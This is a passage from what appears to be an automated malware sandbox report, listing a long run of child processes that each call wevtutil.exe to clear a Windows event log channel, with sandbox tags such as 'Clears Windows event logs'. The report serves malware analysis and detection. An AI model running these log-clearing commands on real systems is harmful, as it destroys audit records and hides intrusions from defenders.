        wevtutil.exe cl "Microsoft-Windows-IME-JPTIP/Analytic"
        7⤵
        
        PID:1524
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IME-KRAPI/Analytic"
        7⤵
        
        PID:4920
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IME-KRTIP/Analytic"
        7⤵
        
        PID:1568
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IME-OEDCompiler/Analytic"
        7⤵
        
        PID:2756
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IME-TCCORE/Analytic"
        7⤵
        
        PID:1500
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IME-TCTIP/Analytic"
        7⤵
        
        PID:4160
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IME-TIP/Analytic"
        7⤵
        
        PID:2752
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IPNAT/Diagnostic"
        7⤵
        
        PID:208
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"
        7⤵
        
        PID:2408
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IPxlatCfg/Debug"
        7⤵
        
        PID:3964
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IPxlatCfg/Operational"
        7⤵
        
        PID:4716
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IdCtrls/Analytic"
        7⤵
        
        PID:3000
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IdCtrls/Operational"
        7⤵
        
        PID:3044
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IndirectDisplays-ClassExtension-Events/Diagnostic"
        7⤵
        
        PID:4860
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Input-HIDCLASS-Analytic"
        7⤵
        
        PID:2952
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-InputSwitch/Diagnostic"
        7⤵
        
        PID:1088
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"
        7⤵
        
        PID:4976
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"
        7⤵
        
        PID:3064
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"
        7⤵
        
        PID:4780
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"
        7⤵
        Clears Windows event logs
        
        PID:1004
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-KdsSvc/Operational"
        7⤵
        
        PID:3248
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kerberos/Operational"
        7⤵
        
        PID:272
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"
        7⤵
        
        PID:288
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-AppCompat/General"
        7⤵
        
        PID:1320
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-AppCompat/Performance"
        7⤵
        
        PID:396
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-ApphelpCache/Analytic"
        7⤵
        Clears Windows event logs
        
        PID:4904
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-ApphelpCache/Debug"
        7⤵
        
        PID:2800
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-ApphelpCache/Operational"
        7⤵
        
        PID:2412
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"
        7⤵
        
        PID:4416
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Operational"
        7⤵
        
        PID:4912
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"
        7⤵
        
        PID:224
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"
        7⤵
        
        PID:3348
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"
        7⤵
        
        PID:3792
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"
        7⤵
        
        PID:3620
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"
        7⤵
        
        PID:4576
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-IO/Operational"
        7⤵
        Clears Windows event logs
        
        PID:3532
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Interrupt-Steering/Diagnostic"
        7⤵
        
        PID:2308
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-IoTrace/Diagnostic"
        7⤵
        
        PID:3732
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-LiveDump/Analytic"
        7⤵
        
        PID:3992
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-LiveDump/Operational"
        7⤵
        
        PID:4672
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"
        7⤵
        Clears Windows event logs
        
        PID:4992
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"
        7⤵
        
        PID:2040
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Pdc/Diagnostic"
        7⤵
        
        PID:2216
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Pep/Diagnostic"
        7⤵
        
        PID:408
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Boot Diagnostic"
        7⤵
        
        PID:3804
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Configuration"
        7⤵
        
        PID:468
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Configuration Diagnostic"
        7⤵
        
        PID:1516
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Device Enumeration Diagnostic"
        7⤵
        
        PID:3996
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Driver Diagnostic"
        7⤵
        
        PID:1800
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Driver Watchdog"
        7⤵
        
        PID:3456
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"
        7⤵
        
        PID:2000
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"
        7⤵
        
        PID:3888
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"
        7⤵
        
        PID:3892
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"
        7⤵
        
        PID:4660
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"
        7⤵
        
        PID:4352
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"
        7⤵
        
        PID:4048
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"
        7⤵
        
        PID:2724
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Performance"
        7⤵
        
        PID:696
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-ShimEngine/Debug"
        7⤵
        
        PID:212
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-ShimEngine/Diagnostic"
        7⤵
        
        PID:1944
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-ShimEngine/Operational"
        7⤵
        
        PID:628
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"
        7⤵
        
        PID:1804
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"
        7⤵
        
        PID:4924
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"
        7⤵
        
        PID:3548
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"
        7⤵
        
        PID:4260
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"
        7⤵
        
        PID:1676
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"
        7⤵
        
        PID:5028
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"
        7⤵
        
        PID:1856
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-XDV/Analytic"
        7⤵
        
        PID:2784
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-KeyboardFilter/Admin"
        7⤵
        
        PID:1340
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-KeyboardFilter/Operational"
        7⤵
        
        PID:4312
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-KeyboardFilter/Performance"
        7⤵
        
        PID:1756
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Known Folders API Service"
        7⤵
        
        PID:2744
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"
        7⤵
        
        PID:1148
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"
        7⤵
        
        PID:1416
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-LSA/Diagnostic"
        7⤵
        
        PID:4524
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-LSA/Operational"
        7⤵
        
        PID:2904
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-LSA/Performance"
        7⤵
        
        PID:4536
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"
        7⤵
        
        PID:5012
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"
        7⤵
        
        PID:4292
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"
        7⤵
        
        PID:4508
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"
        7⤵
        
        PID:3592
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-LimitsManagement/Diagnostic"
        7⤵
        
        PID:3808
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-LinkLayerDiscoveryProtocol/Diagnostic"
        7⤵
        
        PID:3388
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-LinkLayerDiscoveryProtocol/Operational"
        7⤵
        Clears Windows event logs
        
        PID:2420
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-LiveId/Analytic"
        7⤵
        
        PID:4232
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-LiveId/Operational"
        7⤵
        
        PID:5092
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MPEG2-Video-Encoder-MFT_Analytic"
        7⤵
        
        PID:3988
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"
        7⤵
        
        PID:3140
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"
        7⤵
        
        PID:5064
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"
        7⤵
        
        PID:268
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MSFTEDIT/Diagnostic"
        7⤵
        
        PID:284
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"
        7⤵
        
        PID:296
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"
        7⤵
        
        PID:1108
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"
        7⤵
        
        PID:300
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MUI/Admin"
        7⤵
        
        PID:988
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MUI/Analytic"
        7⤵
        
        PID:1976
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MUI/Debug"
        7⤵
        
        PID:3236
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MUI/Operational"
        7⤵
        
        PID:4756
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Media-Streaming/DMC"
        7⤵
        
        PID:3184
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Media-Streaming/DMR"
        7⤵
        
        PID:2972
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Media-Streaming/MDE"
        7⤵
        Clears Windows event logs
        
        PID:2628
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFCaptureEngine/MFCaptureEngine"
        7⤵
        
        PID:4700
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"
        7⤵
        
        PID:2584
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"
        7⤵
        
        PID:2920
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"
        7⤵
        
        PID:2260
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MediaFoundation-Performance/SARStreamResource"
        7⤵
        
        PID:1160
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"
        7⤵
        
        PID:2548
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"
        7⤵
        
        PID:4016
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Minstore/Analytic"
        7⤵
        
        PID:4432
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Minstore/Debug"
        7⤵
        
        PID:388
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-Api-Internal/Analytic"
        7⤵
        
        PID:1080
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-Api/Analytic"
        7⤵
        Clears Windows event logs
        
        PID:2712
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-Parser-Task/Analytic"
        7⤵
        
        PID:5036
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-Parser-Task/Operational"
        7⤵
        
        PID:368
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-SmsApi/Analytic"
        7⤵
        
        PID:2640
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"
        7⤵
        
        PID:4928
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/Admin"
        7⤵
        
        PID:1172
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/Autopilot"
        7⤵
        
        PID:1844
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/Debug"
        7⤵
        
        PID:4812
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/ManagementService"
        7⤵
        
        PID:2956
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Mprddm/Operational"
        7⤵
        
        PID:2728
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"
        7⤵
        
        PID:1800
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NCSI/Operational"
        7⤵
        
        PID:3708
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"
        7⤵
        
        PID:4832
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"
        7⤵
        
        PID:4360
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NDIS/Diagnostic"
        7⤵
        
        PID:1648
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NDIS/Operational"
        7⤵
        
        PID:3144
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NTLM/Operational"
        7⤵
        
        PID:3300
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NWiFi/Diagnostic"
        7⤵
        
        PID:1696
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Narrator/Diagnostic"
        7⤵
        Clears Windows event logs
        
        PID:4308
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Ncasvc/Operational"
        7⤵
        
        PID:3692
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NcdAutoSetup/Diagnostic"
        7⤵
        
        PID:628
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NcdAutoSetup/Operational"
        7⤵
        Clears Windows event logs
        
        PID:3748
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NdisImPlatform/Operational"
        7⤵
        
        PID:3256
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Ndu/Diagnostic"
        7⤵
        
        PID:1824
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NetShell/Performance"
        7⤵
        
        PID:5020
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Network-Connection-Broker"
        7⤵
        
        PID:5076
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Network-DataUsage/Analytic"
        7⤵
        
        PID:1716
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Network-Setup/Diagnostic"
        7⤵
        
        PID:2324
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"
        7⤵
        
        PID:420
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NetworkBridge/Diagnostic"
        7⤵
        
        PID:5112
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NetworkLocationWizard/Operational"
        7⤵
        
        PID:1964
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Diagnostic"
        7⤵
        
        PID:4488
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Operational"
        7⤵
        
        PID:1568
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NetworkProvider/Operational"
        7⤵
        
        PID:2756
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NetworkProvisioning/Analytic"
        7⤵
        
        PID:1500
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NetworkProvisioning/Operational"
        7⤵
        
        PID:4160
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NetworkSecurity/Debug"
        7⤵
        
        PID:2752
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NetworkStatus/Analytic"
        7⤵
        
        PID:208
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"
        7⤵
        
        PID:5052
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Networking-RealTimeCommunication/Tracing"
        7⤵
        System Time Discovery
        
        PID:4588
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NlaSvc/Diagnostic"
        7⤵
        Clears Windows event logs
        
        PID:4444
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NlaSvc/Operational"
        7⤵
        
        PID:2004
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Ntfs/Operational"
        7⤵
        
        PID:2212
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Ntfs/Performance"
        7⤵
        
        PID:1952
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Ntfs/WHC"
        7⤵
        
        PID:2136
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OLE/Clipboard-Performance"
        7⤵
        
        PID:1980
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OLEACC/Debug"
        7⤵
        
        PID:1124
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OLEACC/Diagnostic"
        7⤵
        
        PID:3460
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OOBE-FirstLogonAnim/Diagnostic"
        7⤵
        Clears Windows event logs
        
        PID:1548
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OOBE-Machine-Core/Diagnostic"
        7⤵
        
        PID:1664
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OOBE-Machine-DUI/Diagnostic"
        7⤵
        Clears Windows event logs
        
        PID:1764
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OOBE-Machine-DUI/Operational"
        7⤵
        
        PID:3772
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OOBE-Machine-Plugins-Wireless/Diagnostic"
        7⤵
        
        PID:1216
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OcpUpdateAgent/Operational"
        7⤵
        
        PID:280
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"
        7⤵
        
        PID:292
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"
        7⤵
        
        PID:4904
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Operational"
        7⤵
        
        PID:312
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OfflineFiles/SyncLog"
        7⤵
        
        PID:4528
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OneBackup/Debug"
        7⤵
        
        PID:1748
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OneX/Diagnostic"
        7⤵
        
        PID:4380
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OneX/Operational"
        7⤵
        
        PID:1956
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OobeLdr/Analytic"
        7⤵
        
        PID:4912
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OtpCredentialProvider/Operational"
        7⤵
        
        PID:224
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PCI/Diagnostic"
        7⤵
        
        PID:3380
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PackageStateRoaming/Analytic"
        7⤵
        
        PID:3792
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PackageStateRoaming/Debug"
        7⤵
        
        PID:3628
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PackageStateRoaming/Operational"
        7⤵
        
        PID:3620
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ParentalControls/Operational"
        7⤵
        
        PID:3212
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Partition/Analytic"
        7⤵
        
        PID:4124
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Partition/Diagnostic"
        7⤵
        
        PID:2308
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"
        7⤵
        
        PID:2468
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PerceptionRuntime/Operational"
        7⤵
        
        PID:3992
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PerceptionSensorDataService/Operational"
        7⤵
        
        PID:4276
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PersistentMemory-Nvdimm/Analytic"
        7⤵
        
        PID:3136
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PersistentMemory-Nvdimm/Diagnostic"
        7⤵
        
        PID:4668
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PersistentMemory-Nvdimm/Operational"
        7⤵
        
        PID:2216
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PersistentMemory-PmemDisk/Analytic"
        7⤵
        
        PID:3500
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PersistentMemory-PmemDisk/Diagnostic"
        7⤵
        
        PID:3804
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PersistentMemory-PmemDisk/Operational"
        7⤵
        
        PID:408
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PersistentMemory-ScmBus/Analytic"
        7⤵
        
        PID:1516
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PersistentMemory-ScmBus/Certification"
        7⤵
        
        PID:3996
        
